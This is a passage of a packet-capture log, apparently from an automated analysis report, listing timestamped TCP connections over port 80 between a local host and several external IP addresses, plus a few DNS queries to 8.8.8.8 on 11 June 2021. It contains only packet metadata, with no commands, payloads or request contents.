Jun 11, 2021 15:59:28.689265966 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.689270973 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.689302921 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.689323902 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.689340115 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.689363003 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.689377069 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.689403057 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.689424038 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.689426899 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.689467907 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.689491034 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.689506054 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.689528942 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.689546108 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.689570904 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.689594030 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.689604998 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.689631939 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.689660072 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.689670086 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.689675093 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.689707994 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.689733982 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.689748049 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.689754963 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.689798117 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.689821005 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.689861059 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.695302010 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.695348024 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.695372105 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.695378065 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.695391893 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.695410013 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.695434093 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.695451021 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.695463896 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.695488930 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.695508003 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.695522070 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.695552111 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.695554972 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.695574045 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.695584059 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.695601940 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.695615053 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.695641041 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.695667982 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.695905924 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.695941925 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.695956945 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.695981026 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.695997953 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696014881 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696044922 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696044922 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696058989 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696074963 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696105003 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696116924 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696130991 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696135998 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696156025 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696170092 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696192980 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696199894 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696218967 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696237087 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696252108 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696270943 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696291924 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696300983 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696327925 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696333885 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696347952 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696366072 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696391106 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696394920 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696408987 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696427107 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696450949 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696458101 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696475983 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696496010 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696515083 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696528912 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696553946 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696561098 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696577072 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696593046 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696615934 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696623087 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696643114 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696652889 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696672916 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696685076 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696705103 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696716070 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696733952 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696754932 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696772099 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696788073 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696813107 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696816921 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696840048 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696851015 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696871996 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696881056 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696897984 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696911097 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696937084 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696940899 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.696955919 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.696981907 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697005987 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697011948 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697030067 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697043896 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697072029 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697073936 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697093010 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697112083 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697128057 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697145939 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697165012 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697175980 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697204113 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697207928 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697225094 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697238922 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697252035 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697268963 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697294950 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697299957 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697319031 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697330952 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697349072 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697367907 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697380066 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697402000 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697421074 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697432041 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697453976 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697463989 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697479010 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697494030 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697515965 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697524071 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697540998 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697555065 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697571039 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697585106 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697612047 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697622061 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697634935 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697654963 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697683096 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697685003 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697696924 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697715044 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697741985 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697746038 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697763920 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697776079 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697799921 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697807074 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697824955 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697837114 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697854042 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697874069 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697892904 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697906971 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697931051 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697937965 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697953939 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697968006 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.697993040 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.697999001 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698019981 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698029041 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698043108 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698060036 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698084116 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698088884 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698107004 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698126078 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698143959 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698158979 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698185921 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698188066 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698204994 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698219061 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698232889 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698250055 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698273897 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698278904 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698297977 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698309898 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698327065 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698340893 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698360920 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698378086 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698383093 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698411942 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698434114 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698448896 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698466063 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698482037 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698499918 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698512077 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698539972 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698540926 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698554993 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698571920 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698599100 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698602915 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698622942 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698640108 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698648930 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698673010 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698694944 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698702097 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698728085 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698734999 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698745012 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698765039 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698791981 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698793888 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698812962 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698824883 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698849916 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698856115 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698869944 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698894024 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698914051 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698926926 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698957920 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.698961020 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698976994 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.698988914 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.699002981 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.699019909 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.699043036 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.699048996 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.699073076 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.699079990 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.699090958 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.699109077 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.699130058 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.699167967 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.699171066 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.699194908 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.699223995 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.699239969 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.826452971 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.826885939 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:29.545095921 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:32.108887911 CEST	80	49173	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:32.108964920 CEST	49173	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:32.435766935 CEST	80	49172	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:32.435954094 CEST	49172	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:44.893203974 CEST	49175	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:44.959206104 CEST	80	49175	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:44.959306002 CEST	49175	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:44.959641933 CEST	49175	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:45.065604925 CEST	80	49175	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:45.176253080 CEST	80	49175	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:45.176311016 CEST	80	49175	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:45.176368952 CEST	80	49175	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:45.176393032 CEST	49175	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:45.176410913 CEST	80	49175	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:45.176453114 CEST	80	49175	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:45.176492929 CEST	80	49175	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:45.176522970 CEST	80	49175	93.157.97.6	192.168.2.22
Jun 11, 2021 15:59:45.176563978 CEST	49175	80	192.168.2.22	93.157.97.6
Jun 11, 2021 15:59:45.176768064 CEST	49175	80	192.168.2.22	93.157.97.6
Jun 11, 2021 16:00:10.089504957 CEST	49176	80	192.168.2.22	93.157.97.6
Jun 11, 2021 16:00:10.155819893 CEST	80	49176	93.157.97.6	192.168.2.22
Jun 11, 2021 16:00:10.155932903 CEST	49176	80	192.168.2.22	93.157.97.6
Jun 11, 2021 16:00:10.156811953 CEST	49176	80	192.168.2.22	93.157.97.6
Jun 11, 2021 16:00:10.265613079 CEST	80	49176	93.157.97.6	192.168.2.22
Jun 11, 2021 16:00:12.184010029 CEST	80	49176	93.157.97.6	192.168.2.22
Jun 11, 2021 16:00:12.184077978 CEST	80	49176	93.157.97.6	192.168.2.22
Jun 11, 2021 16:00:12.184132099 CEST	80	49176	93.157.97.6	192.168.2.22
Jun 11, 2021 16:00:12.184184074 CEST	80	49176	93.157.97.6	192.168.2.22
Jun 11, 2021 16:00:12.184211969 CEST	49176	80	192.168.2.22	93.157.97.6
Jun 11, 2021 16:00:12.184237957 CEST	80	49176	93.157.97.6	192.168.2.22
Jun 11, 2021 16:00:12.184254885 CEST	49176	80	192.168.2.22	93.157.97.6
Jun 11, 2021 16:00:12.184349060 CEST	80	49176	93.157.97.6	192.168.2.22
Jun 11, 2021 16:00:12.184391022 CEST	49176	80	192.168.2.22	93.157.97.6
Jun 11, 2021 16:00:12.184412003 CEST	80	49176	93.157.97.6	192.168.2.22
Jun 11, 2021 16:00:12.184427977 CEST	49176	80	192.168.2.22	93.157.97.6
Jun 11, 2021 16:00:12.184473038 CEST	49176	80	192.168.2.22	93.157.97.6
Jun 11, 2021 16:00:28.748454094 CEST	49173	80	192.168.2.22	192.3.141.164
Jun 11, 2021 16:00:28.748764992 CEST	49172	80	192.168.2.22	93.157.97.6
Jun 11, 2021 16:00:28.814966917 CEST	80	49172	93.157.97.6	192.168.2.22
Jun 11, 2021 16:00:28.888600111 CEST	80	49173	192.3.141.164	192.168.2.22
Jun 11, 2021 16:00:57.480015993 CEST	49177	80	192.168.2.22	91.227.139.235
Jun 11, 2021 16:00:57.552263021 CEST	80	49177	91.227.139.235	192.168.2.22
Jun 11, 2021 16:00:57.553282022 CEST	49177	80	192.168.2.22	91.227.139.235
Jun 11, 2021 16:00:57.622942924 CEST	49177	80	192.168.2.22	91.227.139.235
Jun 11, 2021 16:00:57.695180893 CEST	80	49177	91.227.139.235	192.168.2.22
Jun 11, 2021 16:00:57.695300102 CEST	80	49177	91.227.139.235	192.168.2.22
Jun 11, 2021 16:00:57.695327997 CEST	80	49177	91.227.139.235	192.168.2.22
Jun 11, 2021 16:00:57.695465088 CEST	49177	80	192.168.2.22	91.227.139.235
Jun 11, 2021 16:00:57.695554972 CEST	49177	80	192.168.2.22	91.227.139.235
Jun 11, 2021 16:00:57.768009901 CEST	80	49177	91.227.139.235	192.168.2.22
Jun 11, 2021 16:01:16.199012995 CEST	49178	80	192.168.2.22	34.102.136.180
Jun 11, 2021 16:01:16.241578102 CEST	80	49178	34.102.136.180	192.168.2.22
Jun 11, 2021 16:01:16.241694927 CEST	49178	80	192.168.2.22	34.102.136.180
Jun 11, 2021 16:01:16.242110014 CEST	49178	80	192.168.2.22	34.102.136.180
Jun 11, 2021 16:01:16.284548044 CEST	80	49178	34.102.136.180	192.168.2.22
Jun 11, 2021 16:01:16.380748034 CEST	80	49178	34.102.136.180	192.168.2.22
Jun 11, 2021 16:01:16.380799055 CEST	80	49178	34.102.136.180	192.168.2.22
Jun 11, 2021 16:01:16.380925894 CEST	49178	80	192.168.2.22	34.102.136.180
Jun 11, 2021 16:01:16.381035089 CEST	49178	80	192.168.2.22	34.102.136.180
Jun 11, 2021 16:01:16.423434019 CEST	80	49178	34.102.136.180	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 11, 2021 15:58:37.836935997 CEST	52197	53	192.168.2.22	8.8.8.8
Jun 11, 2021 15:58:37.898869038 CEST	53	52197	8.8.8.8	192.168.2.22
Jun 11, 2021 15:58:38.804543018 CEST	53099	53	192.168.2.22	8.8.8.8
Jun 11, 2021 15:58:38.863776922 CEST	53	53099	8.8.8.8	192.168.2.22
Jun 11, 2021 15:58:38.878484964 CEST	52838	53	192.168.2.22	8.8.8.8
Jun 11, 2021 15:58:38.938132048 CEST	53	52838	8.8.8.8	192.168.2.22
Jun 11, 2021 15:58:54.606431007 CEST	61200	53	192.168.2.22	8.8.8.8
Jun 11, 2021 15:58:54.659356117 CEST	53	61200	8.8.8.8	192.168.2.22
Jun 11, 2021 15:58:54.666312933 CEST	49548	53	192.168.2.22	8.8.8.8
Jun 11, 2021 15:58:54.768090010 CEST	53	49548	8.8.8.8	192.168.2.22
Jun 11, 2021 15:59:10.201064110 CEST	55627	53	192.168.2.22	8.8.8.8
Jun 11, 2021 15:59:10.260344028 CEST	53	55627	8.8.8.8	192.168.2.22
Jun 11, 2021 15:59:10.271451950 CEST	56009	53	192.168.2.22	8.8.8.8
Jun 11, 2021 15:59:10.334002018 CEST	53	56009	8.8.8.8	192.168.2.22
